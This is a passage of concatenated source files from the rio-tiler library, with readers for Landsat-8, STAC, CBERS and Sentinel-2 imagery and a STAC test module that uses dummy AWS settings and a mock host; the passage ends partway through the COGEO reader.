precollection_pattern = (
r"^L"
r"(?P<sensor>\w{1})"
r"(?P<satellite>\w{1})"
r"(?P<path>[0-9]{3})"
r"(?P<row>[0-9]{3})"
r"(?P<acquisitionYear>[0-9]{4})"
r"(?P<acquisitionJulianDay>[0-9]{3})"
r"(?P<groundStationIdentifier>\w{3})"
r"(?P<archiveVersion>[0-9]{2})$"
)
collection_pattern = (
r"^L"
r"(?P<sensor>\w{1})"
r"(?P<satellite>\w{2})"
r"_"
r"(?P<processingCorrectionLevel>\w{4})"
r"_"
r"(?P<path>[0-9]{3})"
r"(?P<row>[0-9]{3})"
r"_"
r"(?P<acquisitionYear>[0-9]{4})"
r"(?P<acquisitionMonth>[0-9]{2})"
r"(?P<acquisitionDay>[0-9]{2})"
r"_"
r"(?P<processingYear>[0-9]{4})"
r"(?P<processingMonth>[0-9]{2})"
r"(?P<processingDay>[0-9]{2})"
r"_"
r"(?P<collectionNumber>\w{2})"
r"_"
r"(?P<collectionCategory>\w{2})$"
)
for pattern in [collection_pattern, precollection_pattern]:
match = re.match(pattern, sceneid, re.IGNORECASE)
if match:
meta: Dict[str, Any] = match.groupdict()
break
meta["scene"] = sceneid
if meta.get("acquisitionJulianDay"):
date = datetime.datetime(
int(meta["acquisitionYear"]), 1, 1
) + datetime.timedelta(int(meta["acquisitionJulianDay"]) - 1)
meta["date"] = date.strftime("%Y-%m-%d")
else:
meta["date"] = "{}-{}-{}".format(
meta["acquisitionYear"], meta["acquisitionMonth"], meta["acquisitionDay"]
)
collection = meta.get("collectionNumber", "")
if collection != "":
collection = "c{}".format(int(collection))
meta["scheme"] = "s3"
meta["bucket"] = "landsat-pds"
meta["prefix"] = os.path.join(collection, "L8", meta["path"], meta["row"], sceneid)
return meta
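# Worked example (comments only; values follow from the regex groups above):
# landsat_parser("LC08_L1TP_016037_20170813_20170814_01_RT") returns, among
# other keys, path="016", row="037", date="2017-08-13" and
# prefix="c1/L8/016/037/LC08_L1TP_016037_20170813_20170814_01_RT".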
def _landsat_get_mtl(sceneid: str) -> Dict:
"""
Get Landsat-8 MTL metadata.
Attributes
----------
sceneid : str
Landsat sceneid. For scenes after May 2017,
        the sceneid has to be the LANDSAT_PRODUCT_ID.
Returns
-------
out : dict
returns a JSON like object with the metadata.
"""
scene_params = landsat_parser(sceneid)
meta_file = "http://{bucket}.s3.amazonaws.com/{prefix}/{scene}_MTL.txt".format(
**scene_params
)
metadata = str(urlopen(meta_file).read().decode())
return toa_utils._parse_mtl_txt(metadata)
def _convert(arr: numpy.ndarray, band: str, metadata: Dict) -> numpy.ndarray:
"""Convert DN to TOA or Temp."""
if band in ["1", "2", "3", "4", "5", "6", "7", "8", "9"]: # OLI
multi_reflect = metadata["RADIOMETRIC_RESCALING"].get(
f"REFLECTANCE_MULT_BAND_{band}"
)
add_reflect = metadata["RADIOMETRIC_RESCALING"].get(
f"REFLECTANCE_ADD_BAND_{band}"
)
sun_elev = metadata["IMAGE_ATTRIBUTES"]["SUN_ELEVATION"]
arr = 10000 * reflectance.reflectance(
arr, multi_reflect, add_reflect, sun_elev, src_nodata=0
)
elif band in ["10", "11"]: # TIRS
multi_rad = metadata["RADIOMETRIC_RESCALING"].get(f"RADIANCE_MULT_BAND_{band}")
add_rad = metadata["RADIOMETRIC_RESCALING"].get(f"RADIANCE_ADD_BAND_{band}")
k1 = metadata["TIRS_THERMAL_CONSTANTS"].get(f"K1_CONSTANT_BAND_{band}")
k2 = metadata["TIRS_THERMAL_CONSTANTS"].get(f"K2_CONSTANT_BAND_{band}")
arr = brightness_temp.brightness_temp(arr, multi_rad, add_rad, k1, k2)
# TODO
# elif band == "QA":
return arr
def bounds(sceneid: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
sceneid : str
Landsat sceneid. For scenes after May 2017,
        the sceneid has to be the LANDSAT_PRODUCT_ID.
Returns
-------
out : dict
dictionary with image bounds.
"""
meta: Dict = _landsat_get_mtl(sceneid)["L1_METADATA_FILE"]
return dict(
sceneid=sceneid,
bounds=toa_utils._get_bounds_from_metadata(meta["PRODUCT_METADATA"]),
)
def metadata(
sceneid: str,
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Retrieve image bounds and band statistics.
Attributes
----------
sceneid : str
Landsat sceneid. For scenes after May 2017,
        the sceneid has to be the LANDSAT_PRODUCT_ID.
pmin : int, optional, (default: 2)
Histogram minimum cut.
pmax : int, optional, (default: 98)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with bounds and bands statistics.
"""
scene_params = landsat_parser(sceneid)
meta: Dict = _landsat_get_mtl(sceneid)["L1_METADATA_FILE"]
landsat_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
def worker(band: str):
asset = f"{landsat_prefix}_B{band}.TIF"
if band == "QA":
nodata = 1
resamp = "nearest"
else:
nodata = 0
resamp = "bilinear"
with rasterio.open(asset) as src_dst:
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
data, mask = reader.preview(
src_dst, nodata=nodata, resampling_method=resamp, **kwargs
)
if band != "QA":
data = data.astype("float32", casting="unsafe")
data = _convert(data, band, meta)
data = numpy.ma.array(data)
data.mask = mask == 0
statistics = raster_stats(data, percentiles=(pmin, pmax), **hist_options)
return dict(bounds=bounds, statistics=statistics)
with futures.ThreadPoolExecutor(max_workers=constants.MAX_THREADS) as executor:
responses = list(executor.map(worker, LANDSAT_BANDS))
info: Dict[str, Any] = dict(sceneid=sceneid)
info["band_descriptions"] = [(ix + 1, b) for ix, b in enumerate(LANDSAT_BANDS)]
info["bounds"] = [
r["bounds"] for b, r in zip(LANDSAT_BANDS, responses) if b == "8"
][0]
info["statistics"] = {b: d["statistics"] for b, d in zip(LANDSAT_BANDS, responses)}
return info
def tile(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
    bands: Union[Sequence[str], str] = ("4", "3", "2"),
tilesize: int = 256,
pan: bool = False,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from Landsat-8 data.
Attributes
----------
sceneid : str
Landsat sceneid. For scenes after May 2017,
        the sceneid has to be the LANDSAT_PRODUCT_ID.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands : tuple, str, optional (default: ("4", "3", "2"))
Bands index for the RGB combination.
tilesize : int, optional (default: 256)
Output image size.
pan : boolean, optional (default: False)
If True, apply pan-sharpening.
kwargs: dict, optional
        These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(bands, str):
bands = (bands,)
for band in bands:
if band not in LANDSAT_BANDS:
raise InvalidBandName("{} is not a valid Landsat band name".format(band))
scene_params = landsat_parser(sceneid)
meta: Dict = _landsat_get_mtl(sceneid)["L1_METADATA_FILE"]
landsat_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
bounds = toa_utils._get_bounds_from_metadata(meta["PRODUCT_METADATA"])
if not tile_exists(bounds, tile_z, tile_x, tile_y):
raise TileOutsideBounds(
"Tile {}/{}/{} is outside image bounds".format(tile_z, tile_x, tile_y)
)
def worker(band: str):
asset = f"{landsat_prefix}_B{band}.TIF"
if band == "QA":
nodata = 1
resamp = "nearest"
else:
nodata = 0
resamp = "bilinear"
with rasterio.open(asset) as src_dst:
tile, mask = reader.tile(
src_dst,
tile_x,
tile_y,
tile_z,
tilesize=tilesize,
nodata=nodata,
resampling_method=resamp,
)
return tile, mask
with futures.ThreadPoolExecutor(max_workers=constants.MAX_THREADS) as executor:
data, masks = zip(*list(executor.map(worker, bands)))
data = numpy.concatenate(data)
mask = numpy.all(masks, axis=0).astype(numpy.uint8) * 255
if pan:
pan_data, mask = worker("8")
data = pansharpening_brovey(data, pan_data, 0.2, pan_data.dtype)
if bands[0] != "QA" or len(bands) != 1:
for bdx, band in enumerate(bands):
data[bdx] = _convert(data[bdx], band, meta)
return data, mask
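# Illustrative usage sketch (not part of the original module); requires access
# to the public landsat-pds bucket. Scene and tile indexes mirror the tests.
if __name__ == "__main__":
    data, mask = tile(
        "LC08_L1TP_016037_20170813_20170814_01_RT", 71, 102, 8, bands=("4", "3", "2")
    )
    print(data.shape, mask.shape)  # expected: (3, 256, 256) (256, 256)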
|
mvmendes/rio-tiler
|
tests/test_io_stac.py
|
<filename>tests/test_io_stac.py
"""tests rio_tiler.io.stac"""
import json
import os
import pytest
import rasterio
from mock import patch
from rio_tiler.errors import InvalidBandName, TileOutsideBounds
PREFIX = os.path.join(os.path.dirname(__file__), "fixtures")
with open(os.path.join(PREFIX, "stac.json")) as f:
stac_item = json.loads(f.read())
def mock_rasterio_open(asset):
"""Mock rasterio Open."""
assert asset.startswith("http://somewhere-over-the-rainbow.io")
asset = asset.replace("http://somewhere-over-the-rainbow.io", PREFIX)
return rasterio.open(asset)
@pytest.fixture(autouse=True)
def app(monkeypatch):
"""Set fake env to make sure we don't hit AWS services."""
monkeypatch.setenv("AWS_ACCESS_KEY_ID", "jqt")
monkeypatch.setenv("AWS_SECRET_ACCESS_KEY", "rde")
monkeypatch.delenv("AWS_PROFILE", raising=False)
monkeypatch.setenv("AWS_CONFIG_FILE", "/tmp/noconfigheere")
monkeypatch.setenv("AWS_SHARED_CREDENTIALS_FILE", "/tmp/noconfighereeither")
monkeypatch.setenv("GDAL_DISABLE_READDIR_ON_OPEN", "EMPTY_DIR")
from rio_tiler.io import stac
return stac
def test_spatial_info_valid(app):
"""Should raise an exception."""
with pytest.raises(Exception):
app.spatial_info(stac_item)
def test_bounds_valid(app):
"""Should work as expected (get bounds)"""
meta = app.bounds(stac_item)
assert meta["id"] == stac_item["id"]
assert len(meta["bounds"]) == 4
@patch("rio_tiler.reader.rasterio")
def test_metadata_valid(rio, app):
"""Get bounds and get stats for all bands."""
rio.open = mock_rasterio_open
with pytest.raises(InvalidBandName):
app.metadata(stac_item, "vert")
meta = app.metadata(stac_item, "green")
assert meta["id"] == stac_item["id"]
assert len(meta["bounds"]) == 4
assert meta["band_descriptions"][0] == (1, "green")
assert len(meta["statistics"].items()) == 1
assert meta["nodata_types"] == {"green": "Nodata"}
assert meta["dtypes"] == {"green": "uint16"}
meta = app.metadata(stac_item, ["green", "red", "blue"])
assert meta["id"] == stac_item["id"]
assert len(meta["bounds"]) == 4
assert meta["band_descriptions"] == [(1, "green"), (2, "red"), (3, "blue")]
assert len(meta["statistics"].items()) == 3
assert meta["nodata_types"] == {
"green": "Nodata",
"red": "Nodata",
"blue": "Nodata",
}
@patch("rio_tiler.reader.rasterio")
def test_tile_valid(rio, app):
"""Should raise or return tiles."""
rio.open = mock_rasterio_open
with pytest.raises(TileOutsideBounds):
app.tile(stac_item, "green", 701, 102, 8)
data, mask = app.tile(stac_item, "green", 71, 102, 8)
assert data.shape == (1, 256, 256)
assert mask.shape == (256, 256)
|
mvmendes/rio-tiler
|
rio_tiler/io/stac.py
|
"""rio_tiler.io.stac: STAC reader."""
from typing import Any, Dict, Sequence, Tuple
import numpy
from rio_tiler import reader
from rio_tiler.errors import InvalidBandName, TileOutsideBounds
from rio_tiler.utils import tile_exists
def _get_href(stac: Dict, assets: Sequence[str]) -> Sequence[str]:
"""Validate asset names and return asset's url."""
_assets = list(stac["assets"].keys())
for asset in assets:
if asset not in _assets:
raise InvalidBandName(f"{asset} is not a valid asset name.")
return [stac["assets"][asset]["href"] for asset in assets]
def spatial_info(stac: Dict) -> Dict:
"""
Return STAC spatial info.
Attributes
----------
stac : dict
STAC item.
Returns
-------
out : dict.
"""
raise Exception("Not implemented")
def bounds(stac: Dict) -> Dict:
"""
Return STAC bounds.
Attributes
----------
stac : dict
STAC item.
Returns
-------
out : dict
dictionary with image bounds.
"""
return dict(id=stac["id"], bounds=stac["bbox"])
def metadata(
stac: Dict,
assets: Sequence[str],
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Return STAC assets statistics.
Attributes
----------
stac : dict
STAC item.
assets : list
Asset names.
pmin : int, optional, (default: 2)
Histogram minimum cut.
pmax : int, optional, (default: 98)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with image bounds and bands statistics.
"""
if isinstance(assets, str):
assets = (assets,)
assets_url = _get_href(stac, assets)
responses = reader.multi_metadata(
assets_url, percentiles=(pmin, pmax), hist_options=hist_options, **kwargs
)
info: Dict[str, Any] = dict(id=stac["id"])
info["band_descriptions"] = [(ix + 1, b) for ix, b in enumerate(assets)]
info["bounds"] = stac["bbox"]
info["statistics"] = {b: d["statistics"][1] for b, d in zip(assets, responses)}
info["dtypes"] = {b: d["dtype"] for b, d in zip(assets, responses)}
info["nodata_types"] = {b: d["nodata_type"] for b, d in zip(assets, responses)}
return info
def tile(
stac: Dict,
assets: Sequence[str],
tile_x: int,
tile_y: int,
tile_z: int,
tilesize: int = 256,
**kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
    Create mercator tile from STAC assets.
Attributes
----------
stac : dict
STAC item.
assets : list
Asset names.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
tilesize : int, optional (default: 256)
Output image size.
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(assets, str):
assets = (assets,)
if not tile_exists(stac["bbox"], tile_z, tile_x, tile_y):
raise TileOutsideBounds(
f"Tile {tile_z}/{tile_x}/{tile_y} is outside item bounds"
)
assets_url = _get_href(stac, assets)
return reader.multi_tile(assets_url, tile_x, tile_y, tile_z, **kwargs)
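# Illustrative usage sketch (not part of the original module). "stac.json" is a
# hypothetical STAC item file with "green"/"red"/"blue" assets, mirroring
# tests/test_io_stac.py.
if __name__ == "__main__":
    import json
    with open("stac.json") as f:
        stac_item = json.load(f)
    data, mask = tile(stac_item, ["green"], 71, 102, 8)
    print(data.shape, mask.shape)  # expected: (1, 256, 256) (256, 256)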
|
mvmendes/rio-tiler
|
rio_tiler/io/cbers.py
|
"""rio_tiler.cbers: cbers processing."""
import re
from typing import Any, Dict, Sequence, Tuple, Union
import numpy
import rasterio
from rasterio.warp import transform_bounds
from rio_tiler import constants, reader
from rio_tiler.errors import InvalidBandName, InvalidCBERSSceneId, TileOutsideBounds
from rio_tiler.utils import tile_exists
def cbers_parser(sceneid: str) -> Dict:
"""Parse CBERS scene id.
Attributes
----------
sceneid : str
CBERS sceneid.
Returns
-------
out : dict
dictionary with metadata constructed from the sceneid.
"""
if not re.match(r"^CBERS_4_\w+_[0-9]{8}_[0-9]{3}_[0-9]{3}_L[0-9]$", sceneid):
raise InvalidCBERSSceneId("Could not match {}".format(sceneid))
cbers_pattern = (
r"(?P<satellite>\w+)_"
r"(?P<mission>[0-9]{1})"
r"_"
r"(?P<instrument>\w+)"
r"_"
r"(?P<acquisitionYear>[0-9]{4})"
r"(?P<acquisitionMonth>[0-9]{2})"
r"(?P<acquisitionDay>[0-9]{2})"
r"_"
r"(?P<path>[0-9]{3})"
r"_"
r"(?P<row>[0-9]{3})"
r"_"
r"(?P<processingCorrectionLevel>L[0-9]{1})$"
)
meta: Dict[str, Any] = re.match(cbers_pattern, sceneid, re.IGNORECASE).groupdict()
meta["scene"] = sceneid
instrument = meta["instrument"]
instrument_params = {
"MUX": {
"reference_band": "6",
"bands": ("5", "6", "7", "8"),
"rgb": ("7", "6", "5"),
},
"AWFI": {
"reference_band": "14",
"bands": ("13", "14", "15", "16"),
"rgb": ("15", "14", "13"),
},
"PAN10M": {
"reference_band": "4",
"bands": ("2", "3", "4"),
"rgb": ("3", "4", "2"),
},
"PAN5M": {"reference_band": "1", "bands": ("1"), "rgb": ("1", "1", "1")},
}
meta["reference_band"] = instrument_params[instrument]["reference_band"]
meta["bands"] = instrument_params[instrument]["bands"]
meta["rgb"] = instrument_params[instrument]["rgb"]
meta["scheme"] = "s3"
meta["bucket"] = "cbers-pds"
meta["prefix"] = "CBERS4/{instrument}/{path}/{row}/{scene}".format(**meta)
return meta
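# Worked example (comments only): for the MUX scene used in the tests,
# cbers_parser("CBERS_4_MUX_20171121_057_094_L2") yields instrument="MUX",
# reference_band="6", rgb=("7", "6", "5") and
# prefix="CBERS4/MUX/057/094/CBERS_4_MUX_20171121_057_094_L2".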
def bounds(sceneid: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
sceneid : str
CBERS sceneid.
Returns
-------
out : dict
dictionary with image bounds.
"""
scene_params = cbers_parser(sceneid)
cbers_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
with rasterio.open(
"{}_BAND{}.tif".format(cbers_prefix, scene_params["reference_band"])
) as src:
bounds = transform_bounds(
src.crs, constants.WGS84_CRS, *src.bounds, densify_pts=21
)
return dict(sceneid=sceneid, bounds=bounds)
def metadata(
sceneid: str,
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Return band bounds and statistics.
Attributes
----------
sceneid : str
CBERS sceneid.
pmin : int, optional, (default: 2)
Histogram minimum cut.
pmax : int, optional, (default: 98)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with bounds and bands statistics.
"""
scene_params = cbers_parser(sceneid)
cbers_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
bands = scene_params["bands"]
addresses = [f"{cbers_prefix}_BAND{band}.tif" for band in bands]
responses = reader.multi_metadata(
addresses,
indexes=[1],
nodata=0,
percentiles=(pmin, pmax),
hist_options=hist_options,
**kwargs,
)
info: Dict[str, Any] = dict(sceneid=sceneid)
info["instrument"] = scene_params["instrument"]
info["band_descriptions"] = [(ix + 1, b) for ix, b in enumerate(bands)]
info["bounds"] = [
r["bounds"]
for b, r in zip(bands, responses)
if b == scene_params["reference_band"]
][0]
info["statistics"] = {b: d["statistics"][1] for b, d in zip(bands, responses)}
return info
def tile(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
bands: Union[Sequence[str], str] = None,
tilesize: int = 256,
    **kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from CBERS data.
Attributes
----------
sceneid : str
CBERS sceneid.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands : tuple or list or str, optional
Bands index for the RGB combination. If None uses default
defined for the instrument
tilesize : int, optional
Output image size. Default is 256
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(bands, str):
bands = (bands,)
scene_params = cbers_parser(sceneid)
if not bands:
bands = scene_params["rgb"]
for band in bands:
if band not in scene_params["bands"]:
raise InvalidBandName(
"{} is not a valid band name for {} CBERS instrument".format(
band, scene_params["instrument"]
)
)
cbers_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
with rasterio.open(
"{}_BAND{}.tif".format(cbers_prefix, scene_params["reference_band"])
) as src_dst:
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
if not tile_exists(bounds, tile_z, tile_x, tile_y):
raise TileOutsideBounds(
"Tile {}/{}/{} is outside image bounds".format(tile_z, tile_x, tile_y)
)
addresses = [f"{cbers_prefix}_BAND{band}.tif" for band in bands]
    return reader.multi_tile(
        addresses, tile_x, tile_y, tile_z, tilesize=tilesize, nodata=0, **kwargs
    )
def tile_pansharpen(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
bands: Union[Sequence[str], str] = None,
tilesize: int = 256,
    **kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
    Create pansharpened mercator tile from CBERS data.
Attributes
----------
sceneid : str
CBERS sceneid.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands : tuple or list or str, optional
Bands index for the RGB combination. If None uses default
defined for the instrument
tilesize : int, optional
Output image size. Default is 256
kwargs: dict, optional
These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(bands, str):
bands = (bands,)
scene_params = cbers_parser(sceneid)
if not bands:
bands = scene_params["rgb"]
for band in bands:
if band not in scene_params["bands"]:
raise InvalidBandName(
"{} is not a valid band name for {} CBERS instrument".format(
band, scene_params["instrument"]
)
)
cbers_prefix = "{scheme}://{bucket}/{prefix}/{scene}".format(**scene_params)
with rasterio.open(
"{}_BAND{}.tif".format(cbers_prefix, scene_params["reference_band"])
) as src_dst:
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
if not tile_exists(bounds, tile_z, tile_x, tile_y):
raise TileOutsideBounds(
"Tile {}/{}/{} is outside image bounds".format(tile_z, tile_x, tile_y)
)
pan5m = cbers_prefix.replace("PAN10","PAN5")
pan10m = cbers_prefix.replace("PAN5","PAN10")
addresses = [f"{pan10m}_BAND{band}.tif" for band in bands]
addresses.insert(0,"{}_BAND1.tif".format(pan5m))
del addresses[-1]
    return reader.multi_tile(
        addresses, tile_x, tile_y, tile_z, tilesize=tilesize, nodata=0, **kwargs
    )
|
mvmendes/rio-tiler
|
rio_tiler/io/sentinel2.py
|
"""rio_tiler.reader.sentinel2: Sentinel-2 processing."""
import itertools
import os
import re
from collections import OrderedDict
from typing import Any, Dict, Sequence, Tuple, Union
import numpy
import rasterio
from rasterio.warp import transform_bounds
from rio_tiler import constants, reader
from rio_tiler.errors import InvalidBandName, InvalidSentinelSceneId, TileOutsideBounds
from rio_tiler.utils import tile_exists
SENTINEL_L1_BANDS = OrderedDict(
[
("10", ["02", "03", "04", "08"]),
("20", ["05", "06", "07", "11", "12", "8A"]),
("60", ["01", "09", "10"]),
]
)
SENTINEL_L2_BANDS = OrderedDict(
[
("10", ["02", "03", "04", "08"]),
("20", ["02", "03", "04", "05", "06", "07", "08", "11", "12", "8A"]),
(
"60",
["01", "02", "03", "04", "05", "06", "07", "08", "09", "11", "12", "8A"],
),
]
)
SENTINEL_L2_PRODUCTS = OrderedDict(
[
("10", ["AOT", "WVP"]),
("20", ["AOT", "SCL", "WVP"]),
("60", ["AOT", "SCL", "WVP"]),
]
)
def sentinel2_parser(sceneid: str) -> Dict:
"""
Parse Sentinel-2 scene id.
Attributes
----------
sceneid : str
Sentinel-2 sceneid.
Returns
-------
out : dict
dictionary with metadata constructed from the sceneid.
"""
if not re.match("^S2[AB]_L[0-2][A-C]_[0-9]{8}_[0-9]{2}[A-Z]{3}_[0-9]$", sceneid):
raise InvalidSentinelSceneId("Could not match {}".format(sceneid))
sentinel_pattern = (
r"^S"
r"(?P<sensor>\w{1})"
r"(?P<satellite>[AB]{1})"
r"_"
r"(?P<processingLevel>L[0-2][ABC])"
r"_"
r"(?P<acquisitionYear>[0-9]{4})"
r"(?P<acquisitionMonth>[0-9]{2})"
r"(?P<acquisitionDay>[0-9]{2})"
r"_"
r"(?P<utm>[0-9]{2})"
r"(?P<lat>\w{1})"
r"(?P<sq>\w{2})"
r"_"
r"(?P<num>[0-9]{1})$"
)
meta: Dict[str, Any] = re.match(
sentinel_pattern, sceneid, re.IGNORECASE
).groupdict()
meta["scene"] = sceneid
utm_zone = meta["utm"].lstrip("0")
grid_square = meta["sq"]
latitude_band = meta["lat"]
year = meta["acquisitionYear"]
month = meta["acquisitionMonth"].lstrip("0")
day = meta["acquisitionDay"].lstrip("0")
img_num = meta["num"]
meta["scheme"] = "s3"
meta["bucket"] = "sentinel-s2-" + meta["processingLevel"].lower()
meta["prefix"] = os.path.join(
"tiles", utm_zone, latitude_band, grid_square, year, month, day, img_num
)
if meta["processingLevel"] == "L1C":
meta["preview_file"] = "preview.jp2"
meta["preview_prefix"] = ""
meta["bands"] = list(
itertools.chain.from_iterable(
[bands for _, bands in SENTINEL_L1_BANDS.items()]
)
)
meta["valid_bands"] = meta["bands"]
else:
meta["preview_file"] = "R60m/TCI.jp2"
meta["preview_prefix"] = "R60m"
meta["bands"] = SENTINEL_L2_BANDS["60"]
meta["valid_bands"] = meta["bands"] + SENTINEL_L2_PRODUCTS["60"]
return meta
def _l2_prefixed_band(band: str) -> str:
"""Return L2A prefixed bands name."""
if band in SENTINEL_L2_BANDS["60"]:
for res, bands in SENTINEL_L2_BANDS.items():
if band in bands:
return "R{}m/B{}".format(res, band)
elif band in SENTINEL_L2_PRODUCTS["60"]:
for res, bands in SENTINEL_L2_PRODUCTS.items():
if band in bands:
return "R{}m/{}".format(res, band)
raise InvalidBandName("{} is not a valid Sentinel band name".format(band))
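# Worked example (comments only; resolutions come from the ordered dicts above):
#   _l2_prefixed_band("08")  -> "R10m/B08"
#   _l2_prefixed_band("05")  -> "R20m/B05"
#   _l2_prefixed_band("SCL") -> "R20m/SCL"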
def bounds(sceneid: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
sceneid : str
Sentinel-2 sceneid.
Returns
-------
out : dict
dictionary with image bounds.
"""
scene_params = sentinel2_parser(sceneid)
preview_file = "{scheme}://{bucket}/{prefix}/{preview_file}".format(**scene_params)
with rasterio.open(preview_file) as src_dst:
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
return dict(sceneid=sceneid, bounds=bounds)
def metadata(
sceneid: str,
pmin: float = 2.0,
pmax: float = 98.0,
hist_options: Dict = {},
**kwargs: Any,
) -> Dict:
"""
Retrieve image bounds and band statistics.
Attributes
----------
sceneid : str
Sentinel-2 sceneid.
pmin : float, optional, (default: 2.)
Histogram minimum cut.
pmax : float, optional, (default: 98.)
Histogram maximum cut.
hist_options : dict, optional
Options to forward to numpy.histogram function.
e.g: {bins=20, range=(0, 1000)}
kwargs : optional
These are passed to 'rio_tiler.reader.preview'
Returns
-------
out : dict
Dictionary with image bounds and bands statistics.
"""
scene_params = sentinel2_parser(sceneid)
sentinel_prefix = "{scheme}://{bucket}/{prefix}/{preview_prefix}".format(
**scene_params
)
bands = scene_params["bands"]
addresses = [f"{sentinel_prefix}/B{band}.jp2" for band in bands]
responses = reader.multi_metadata(
addresses,
indexes=[1],
nodata=0,
percentiles=(pmin, pmax),
hist_options=hist_options,
**kwargs,
)
info: Dict[str, Any] = dict(sceneid=sceneid)
info["band_descriptions"] = [(ix + 1, b) for ix, b in enumerate(bands)]
info["bounds"] = responses[0]["bounds"]
info["statistics"] = {
b: v for b, d in zip(bands, responses) for k, v in d["statistics"].items()
}
return info
def tile(
sceneid: str,
tile_x: int,
tile_y: int,
tile_z: int,
bands: Union[Sequence[str], str] = ("04", "03", "02"),
tilesize: int = 256,
    **kwargs: Any,
) -> Tuple[numpy.ndarray, numpy.ndarray]:
"""
Create mercator tile from Sentinel-2 data.
Attributes
----------
sceneid : str
Sentinel-2 sceneid.
tile_x : int
Mercator tile X index.
tile_y : int
Mercator tile Y index.
tile_z : int
Mercator tile ZOOM level.
bands : tuple, str, optional (default: ('04', '03', '02'))
Bands index for the RGB combination.
tilesize : int, optional (default: 256)
Output image size.
kwargs: dict, optional
        These will be passed to the 'rio_tiler.reader.tile' function.
Returns
-------
data : numpy ndarray
mask: numpy array
"""
if isinstance(bands, str):
bands = (bands,)
scene_params = sentinel2_parser(sceneid)
for band in bands:
if band not in scene_params["valid_bands"]:
raise InvalidBandName("{} is not a valid Sentinel band name".format(band))
sentinel_prefix = "{scheme}://{bucket}/{prefix}".format(**scene_params)
preview_file = os.path.join(sentinel_prefix, scene_params["preview_file"])
with rasterio.open(preview_file) as src:
bounds = transform_bounds(
src.crs, constants.WGS84_CRS, *src.bounds, densify_pts=21
)
if not tile_exists(bounds, tile_z, tile_x, tile_y):
raise TileOutsideBounds(
"Tile {}/{}/{} is outside image bounds".format(tile_z, tile_x, tile_y)
)
if scene_params["processingLevel"] == "L2A":
bands = [_l2_prefixed_band(b) for b in bands]
else:
bands = ["B{}".format(b) for b in bands]
addresses = [f"{sentinel_prefix}/{band}.jp2" for band in bands]
    return reader.multi_tile(
        addresses, tile_x, tile_y, tile_z, tilesize=tilesize, nodata=0, **kwargs
    )
|
mvmendes/rio-tiler
|
rio_tiler/io/cogeo.py
|
"""rio_tiler.io.cogeo: raster processing."""
from typing import Any, Dict, List, Optional, Tuple
import numpy
import rasterio
from rasterio.crs import CRS
from rasterio.warp import transform_bounds
from rio_tiler import constants, reader
from rio_tiler.mercator import get_zooms
from rio_tiler.utils import has_alpha_band, has_mask_band
def spatial_info(address: str) -> Dict:
"""
Return COGEO spatial info.
Attributes
----------
address : str or PathLike object
A dataset path or URL. Will be opened in "r" mode.
Returns
-------
out : dict.
"""
with rasterio.open(address) as src_dst:
minzoom, maxzoom = get_zooms(src_dst)
bounds = transform_bounds(
src_dst.crs, constants.WGS84_CRS, *src_dst.bounds, densify_pts=21
)
center = [(bounds[0] + bounds[2]) / 2, (bounds[1] + bounds[3]) / 2, minzoom]
return dict(
address=address, bounds=bounds, center=center, minzoom=minzoom, maxzoom=maxzoom
)
def bounds(address: str) -> Dict:
"""
Retrieve image bounds.
Attributes
----------
address : str
file url.
Returns
-------
out : dict
dictionary with image bounds.
"""
with rasterio.open(address) as src_dst:
bounds = transform_bounds(
